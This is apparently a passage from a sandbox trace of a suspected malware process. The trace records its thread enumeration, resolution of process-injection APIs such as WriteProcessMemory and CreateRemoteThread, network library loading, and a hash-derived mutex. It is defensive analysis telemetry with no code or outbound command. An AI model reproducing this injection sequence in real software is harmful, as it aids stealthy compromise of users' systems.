[0173.903] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.903] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.904] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.904] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.904] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.905] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.905] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.905] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.905] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.906] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.906] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.906] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.906] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.907] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.907] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.907] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.907] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.908] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.908] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.908] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.909] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.909] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.909] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.909] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.910] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.910] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.910] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.910] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.911] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.911] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.911] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.912] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.912] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.912] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.912] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.913] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.913] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.913] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.913] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.914] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.914] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.914] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.915] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.915] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.915] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.915] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.916] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.916] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.916] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.916] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.917] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.917] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.942] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.943] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.943] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.943] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.944] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.944] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.944] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.944] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.945] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.945] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.945] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.945] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.946] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.946] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.946] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.946] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.947] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.947] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.947] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.948] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.948] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.948] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.949] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.949] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.949] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.949] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.950] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.950] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.950] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.950] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.951] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.951] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.951] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.951] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.952] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.952] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.952] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.953] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.953] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.953] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.953] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.954] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.954] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.954] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.954] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.955] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.955] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.955] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.956] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.956] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.956] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.956] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.957] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.957] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.957] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.957] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.958] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.958] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.958] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.958] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.959] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.959] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.959] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.960] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.960] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.960] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.960] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.961] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.961] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.961] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.961] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.962] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.962] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.962] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.962] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.963] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.963] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.963] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.963] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.964] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.964] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.964] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.965] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.965] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.965] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.965] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.966] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.966] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.966] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.966] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.967] Thread32Next (hSnapshot=0x88, lpte=0x243fea8) returned 1 [0173.985] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7e8) returned 0x8c [0173.985] ResumeThread (hThread=0x8c) returned 0x1 [0173.985] CloseHandle (hObject=0x8c) returned 1 [0173.985] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x99c) returned 0x8c [0173.985] ResumeThread (hThread=0x8c) returned 0x1 [0173.985] CloseHandle (hObject=0x8c) returned 1 [0174.007] CloseHandle (hObject=0x88) returned 1 [0174.007] VirtualQuery (in: lpAddress=0x3509e8, lpBuffer=0x243fe9c, dwLength=0x1c | out: lpBuffer=0x243fe9c*(BaseAddress=0x350000, AllocationBase=0x330000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0174.007] GetProcessHeap () returned 0x330000 [0174.007] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x3509e8 | out: hHeap=0x330000) returned 1 [0174.008] VirtualQuery (in: lpAddress=0x3508d8, lpBuffer=0x243fe9c, dwLength=0x1c | out: lpBuffer=0x243fe9c*(BaseAddress=0x350000, AllocationBase=0x330000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0174.008] GetProcessHeap () returned 0x330000 [0174.008] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x3508d8 | out: hHeap=0x330000) returned 1 [0174.008] RtlExitUserThread (Status=0x0) Process: id = "37" image_name = "bags shakira tourism.exe" filename = "c:\\program files\\windows portable devices\\bags shakira tourism.exe" page_root = "0x64f87000" os_pid = "0x5d8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "16" os_parent_pid = "0x958" cmd_line = "\"C:\\Program Files\\Windows Portable Devices\\bags shakira tourism.exe\" " cur_dir = "C:\\Program Files\\Windows Portable Devices\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 279 os_tid = 0x998 Thread: id = 280 os_tid = 0x3c0 Thread: id = 281 os_tid = 0x710 [0173.685] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0173.685] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0173.685] GetProcAddress (hModule=0x76c20000, lpProcName="ReadProcessMemory") returned 0x76c4cfcc [0173.685] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32Next") returned 0x76cb5c3f [0173.686] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0173.686] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0173.686] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0173.686] GetProcAddress (hModule=0x76c20000, lpProcName="RtlMoveMemory") returned 0x77193c40 [0173.686] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0173.686] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0173.686] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0173.686] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0173.686] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0173.686] GetProcAddress (hModule=0x76c20000, lpProcName="OpenThread") returned 0x76c41248 [0173.686] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0173.686] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0173.686] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0173.687] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0173.687] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0173.687] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0173.687] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0173.687] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0173.687] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0173.687] GetProcAddress (hModule=0x76c20000, lpProcName="WriteProcessMemory") returned 0x76c4d9e0 [0173.687] GetProcAddress (hModule=0x76c20000, lpProcName="SuspendThread") returned 0x76c57d7e [0173.687] GetProcAddress (hModule=0x76c20000, lpProcName="ResumeThread") returned 0x76c343ef [0173.687] GetProcAddress (hModule=0x76c20000, lpProcName="RtlZeroMemory") returned 0x77193c10 [0173.687] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32First") returned 0x76cb5b93 [0173.687] GetProcAddress (hModule=0x76c20000, lpProcName="CreateRemoteThread") returned 0x76cb416b [0173.687] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0173.688] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0173.688] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0173.688] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0173.688] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0173.688] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0173.688] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0173.688] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0173.688] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0173.688] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0173.688] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0173.688] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0173.689] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0173.689] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0173.689] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGetHashParam") returned 0x74d4df7e [0173.689] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0173.689] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0173.689] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0173.695] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0173.695] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0173.695] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0173.698] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0173.699] GetProcAddress (hModule=0x74850000, lpProcName="DnsQuery_W") returned 0x7486572c [0173.699] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0173.699] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0173.699] GetProcAddress (hModule=0x77130000, lpProcName="NtSetInformationProcess") returned 0x7714fb18 [0173.699] GetProcAddress (hModule=0x77130000, lpProcName="NtMapViewOfSection") returned 0x7714fc40 [0173.699] GetProcAddress (hModule=0x77130000, lpProcName="LdrProcessRelocationBlock") returned 0x771de9cf [0173.699] GetProcAddress (hModule=0x77130000, lpProcName="NtUnmapViewOfSection") returned 0x7714fc70 [0173.699] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0173.699] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0173.699] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0173.699] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0173.702] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReadData") returned 0x747fcb9e [0173.702] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpAddRequestHeaders") returned 0x74809dfb [0173.702] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCrackUrl") returned 0x7480953a [0173.702] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetProxyForUrl") returned 0x747fd5dc [0173.702] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpenRequest") returned 0x747f4aea [0173.702] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0173.702] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCloseHandle") returned 0x747f2c01 [0173.702] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSendRequest") returned 0x747f79bd [0173.703] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7480257e [0173.703] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSetOption") returned 0x747f3f6c [0173.703] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReceiveResponse") returned 0x747fb262 [0173.703] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpConnect") returned 0x747fd9f5 [0173.703] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0173.703] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0173.703] GetProcAddress (hModule=0x75bc0000, lpProcName=0x5) returned 0x75bc7147 [0173.703] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0173.703] VirtualProtect (in: lpAddress=0x200000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0xd0fb88 | out: lpflOldProtect=0xd0fb88*=0x40) returned 1 [0173.703] VirtualProtect (in: lpAddress=0x200000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0xd0fb88 | out: lpflOldProtect=0xd0fb88*=0x4) returned 1 [0173.705] VirtualQuery (in: lpAddress=0x210016, lpBuffer=0xd0fb80, dwLength=0x1c | out: lpBuffer=0xd0fb80*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x40, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x40000)) returned 0x1c [0173.705] GetProcessHeap () returned 0x770000 [0173.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x364) returned 0x7905f8 [0173.705] RtlMoveMemory (in: Destination=0x7905f8, Source=0x210016, Length=0x363 | out: Destination=0x7905f8) [0173.705] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x210016) returned 0x0 [0173.705] GetCurrentProcessId () returned 0x5d8 [0173.705] GetProcessHeap () returned 0x770000 [0173.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x105) returned 0x790968 [0173.705] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x790968, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Portable Devices\\bags shakira tourism.exe" (normalized: "c:\\program files\\windows portable devices\\bags shakira tourism.exe")) returned 0x42 [0173.705] GetProcessHeap () returned 0x770000 [0173.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x8, Size=0x105) returned 0x790a78 [0173.705] GetCurrentProcessId () returned 0x5d8 [0173.705] wsprintfA (in: param_1=0x790a78, param_2="%s%d%d%d" | out: param_1="C:\\Program Files\\Windows Portable Devices\\bags shakira tourism.exe37084212414963") returned 80 [0173.705] CryptAcquireContextA (in: phProv=0xd0fb84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xd0fb84*=0x790bc8) returned 1 [0173.766] CryptCreateHash (in: hProv=0x790bc8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xd0fb88 | out: phHash=0xd0fb88) returned 1 [0173.766] lstrlenA (lpString="C:\\Program Files\\Windows Portable Devices\\bags shakira tourism.exe37084212414963") returned 80 [0173.766] CryptHashData (hHash=0x7914e0, pbData=0x790a78, dwDataLen=0x50, dwFlags=0x0) returned 1 [0173.767] CryptGetHashParam (in: hHash=0x7914e0, dwParam=0x2, pbData=0xd0fb74, pdwDataLen=0xd0fb8c, dwFlags=0x0 | out: pbData=0xd0fb74, pdwDataLen=0xd0fb8c) returned 1 [0173.767] wsprintfA (in: param_1=0x790a78, param_2="%02X" | out: param_1="8D") returned 2 [0173.767] wsprintfA (in: param_1=0x790a7a, param_2="%02X" | out: param_1="F2") returned 2 [0173.767] wsprintfA (in: param_1=0x790a7c, param_2="%02X" | out: param_1="D5") returned 2 [0173.767] wsprintfA (in: param_1=0x790a7e, param_2="%02X" | out: param_1="DC") returned 2 [0173.767] wsprintfA (in: param_1=0x790a80, param_2="%02X" | out: param_1="17") returned 2 [0173.767] wsprintfA (in: param_1=0x790a82, param_2="%02X" | out: param_1="98") returned 2 [0173.767] wsprintfA (in: param_1=0x790a84, param_2="%02X" | out: param_1="D4") returned 2 [0173.767] wsprintfA (in: param_1=0x790a86, param_2="%02X" | out: param_1="B6") returned 2 [0173.767] wsprintfA (in: param_1=0x790a88, param_2="%02X" | out: param_1="EB") returned 2 [0173.767] wsprintfA (in: param_1=0x790a8a, param_2="%02X" | out: param_1="13") returned 2 [0173.767] wsprintfA (in: param_1=0x790a8c, param_2="%02X" | out: param_1="A3") returned 2 [0173.767] wsprintfA (in: param_1=0x790a8e, param_2="%02X" | out: param_1="DE") returned 2 [0173.767] wsprintfA (in: param_1=0x790a90, param_2="%02X" | out: param_1="12") returned 2 [0173.767] wsprintfA (in: param_1=0x790a92, param_2="%02X" | out: param_1="D6") returned 2 [0173.767] wsprintfA (in: param_1=0x790a94, param_2="%02X" | out: param_1="F6") returned 2 [0173.767] wsprintfA (in: param_1=0x790a96, param_2="%02X" | out: param_1="2E") returned 2 [0173.767] CryptDestroyHash (hHash=0x7914e0) returned 1 [0173.767] CryptReleaseContext (hProv=0x790bc8, dwFlags=0x0) returned 1 [0173.767] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="8DF2D5DC1798D4B6EB13A3DE12D6F62E") returned 0x80 [0173.767] GetLastError () returned 0x0 [0173.767] Sleep (dwMilliseconds=0x1f4) [0174.354] GetCurrentProcessId () returned 0x5d8 [0174.354] GetCurrentThreadId () returned 0x710 [0174.354] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x88 [0174.357] Thread32First (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.357] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.357] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.358] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.358] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.358] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.358] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.359] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.359] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.359] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.359] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.360] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.360] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.360] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.361] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.361] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.361] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.361] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.362] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.362] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.362] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.362] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.363] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.363] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.363] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.364] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.364] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.364] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.364] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.365] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.365] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.365] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.366] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.367] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.367] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.367] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.368] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.368] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.368] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.369] Thread32Next (hSnapshot=0x88, lpte=0xd0fb78) returned 1 [0174.369] 